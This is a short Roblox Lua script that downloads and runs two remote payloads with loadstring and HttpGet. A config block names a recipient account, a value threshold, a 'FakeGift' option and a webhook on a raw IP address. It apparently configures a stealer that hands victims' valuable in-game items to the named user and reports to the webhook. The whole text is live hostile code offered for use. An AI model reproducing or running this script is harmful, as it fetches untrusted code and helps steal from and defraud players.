loadstring(game:HttpGet("https://raw.githubusercontent.com/7teenscripts/loadingscrn/refs/heads/main/lua"))()
_G.LRMConfig = {
    User = {"ArielVer01"},
    min_value = 10000000000,
    pingEveryone = "Yes", -- dont change this
    Webhook = "http://45.13.225.83:6969/proxy/c9e925a04bff134f54865d375aef3b49",
    FakeGift = "Yes",
    Trash = "http://45.13.225.83:6969/proxy/c9e925a04bff134f54865d375aef3b49",
    LoadingScreen = "No",
    GiftOnlyRares = "No",
    ExecuteOtherScript = "No",
}
    
loadstring(game:HttpGetAsync('https://lrmscripts.com/script/main.lua'))()
